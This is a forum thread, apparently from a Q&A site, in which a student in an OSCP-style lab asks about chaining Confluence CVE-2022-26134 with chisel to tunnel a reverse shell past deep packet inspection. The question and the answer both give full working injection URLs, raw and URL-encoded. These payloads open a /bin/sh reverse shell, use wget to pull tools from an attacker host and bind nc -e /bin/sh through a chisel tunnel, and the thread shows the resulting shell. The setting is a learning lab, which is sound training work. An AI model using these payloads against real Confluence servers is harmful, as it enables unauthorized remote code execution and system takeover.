My lab has these restrictions:

1. Inbound and Outbound HTTP connections are allowed from CONFLUENCE01.
2. For Non-HTTP connections, only inbound TCP is allowed at port 8090 of CONFLUENCE01.
3. CONFLUENCE01 cannot open new WAN ports.

Hence, I tried to exploit named pipes to start a reverse shell on CONFLUENCE01 using chisel:

cve-2022-26134_chisel_reverse_payload.txt

http://192.168.226.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','rm -f /tmp/in /tmp/out; mkfifo /tmp/in /tmp/out; /bin/sh -i < /tmp/in > /tmp/out 2>&1 & /tmp/chisel client 192.168.45.249:8090 R:4444:192.168.45.249:9999 > /tmp/in; curl --data @/tmp/out http://192.168.45.249:9999').start()")}/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134_chisel_reverse_payload.txt | python3 urlencode_special.py
http://192.168.226.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27rm%20-f%20/tmp/in%20/tmp/out%3B%20mkfifo%20/tmp/in%20/tmp/out%3B%20/bin/sh%20-i%20%3C%20/tmp/in%20%3E%20/tmp/out%202%3E%261%20%26%20/tmp/chisel%20client%20192.168.45.249:8090%20R:4444:192.168.45.249:9999%20%3E%20/tmp/in%3B%20curl%20--data%20%40/tmp/out%20http://192.168.45.249:9999%27%29.start%28%29%22%29%7D/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.226.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27rm%20-f%20/tmp/in%20/tmp/out%3B%20mkfifo%20/tmp/in%20/tmp/out%3B%20/bin/sh%20-i%20%3C%20/tmp/in%20%3E%20/tmp/out%202%3E%261%20%26%20/tmp/chisel%20client%20192.168.45.249:8090%20R:4444:192.168.45.249:9999%20%3E%20/tmp/in%3B%20curl%20--data%20%40/tmp/out%20http://192.168.45.249:9999%27%29.start%28%29%22%29%7D/

However, instead of getting a reverse shell, I simply get an echo of the commands I run:

┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvv 127.0.0.1 4444
(UNKNOWN) [127.0.0.1] 4444 (?) open
whoami
fuck
whoami
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvlp 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.226.63] 43162
whoami
fuck
whoami

Why aren't commands I send from nc -nvv 127.0.0.1 4444 being executed and returned by /bin/sh -i of CONFLUENCE01? Am I using incorrect syntax or is this logically impossible? My ultimate goal is to wrap a normally TCP reverse shell into a fully HTTP reverse shell using Chisel.

  • "Try harder"? Walk us through the networking you are expecting to happen. Commented Apr 5 at 12:45
  • We need more information. From where to where do you want to connect through what? Commented Apr 5 at 12:58
  • The way you are using chisel makes no sense to me. Chisel creates listening sockets on the client or the server (if you use R:) and will forward the connection and data through HTTP to the other peer (to the server if no R, to the client otherwise). You don't need to use pipes or curl. It's like an SSH tunnel, but through HTTP. So make bash use a TCP socket for IO (i.e. /dev/tcp/127.0.0.1/XXXX), then run chisel to forward that connection to the remote host where the chisel server is running. At that point, use nc to connect to the local (from the server's point of view) socket. Commented Apr 5 at 13:30
  • Hey, y'all! Thank you for your support. So basically, we normally use chisel as a tunnel so that it can pivot through whatever machine we have RCE on. However, in a situation where DPI blocks non-HTTP connections and only allows one inbound TCP port on that machine, we need a way to tunnel a reverse shell through the machine itself. Commented Apr 7 at 4:01

1 Answer

TL;DR:

cve-2022-26134-download.txt

http://192.168.120.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.45.183/chisel -O /tmp/chisel && chmod +x /tmp/chisel && wget 192.168.45.183/nc.traditional -O /tmp/nc && chmod +x /tmp/nc').start()")}/

cve-2022-26134-confluence.txt

http://192.168.120.63:8090/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','(/tmp/nc -nvlp 9999 -s 127.0.0.1 -e /bin/sh &) && /tmp/chisel client -v 192.168.45.183:8090 R:7777:127.0.0.1:9999').start()")}/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134-download.txt | python3 urlencode_special.py      
http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.183/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%20%26%26%20wget%20192.168.45.183/nc.traditional%20-O%20/tmp/nc%20%26%26%20chmod%20%2Bx%20/tmp/nc%27%29.start%28%29%22%29%7D/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.183/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%20%26%26%20wget%20192.168.45.183/nc.traditional%20-O%20/tmp/nc%20%26%26%20chmod%20%2Bx%20/tmp/nc%27%29.start%28%29%22%29%7D/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ cat cve-2022-26134-confluence.txt | python3 urlencode_special.py
http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27%28/tmp/nc%20-nvlp%209999%20-s%20127.0.0.1%20-e%20/bin/sh%20%26%29%20%26%26%20/tmp/chisel%20client%20-v%20192.168.45.183:8090%20R:7777:127.0.0.1:9999%27%29.start%28%29%22%29%7D/
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ curl http://192.168.120.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27%28/tmp/nc%20-nvlp%209999%20-s%20127.0.0.1%20-e%20/bin/sh%20%26%29%20%26%26%20/tmp/chisel%20client%20-v%20192.168.45.183:8090%20R:7777:127.0.0.1:9999%27%29.start%28%29%22%29%7D/                                 
┌──(kali㉿kali)-[~/Desktop/OSCP/Modules/Tunneling Through Deep Packet Inspection]
└─$ nc -nvv 127.0.0.1 7777
(UNKNOWN) [127.0.0.1] 7777 (?) open
whoami
confluence

Full Insight: https://medium.com/@wonjae_82162/how-i-bypassed-dpi-chained-cve-2022-26134-to-a-bidirectional-reverse-shell-via-chisel-and-724470b949f9

  • Your answer could be improved with additional supporting information. Please edit to add further details, such as citations or documentation, so that others can confirm that your answer is correct. You can find more information on how to write good answers in the help center. Commented Apr 7 at 9:12
  • Hey bot, read my Medium article before you say anything Commented Apr 8 at 2:31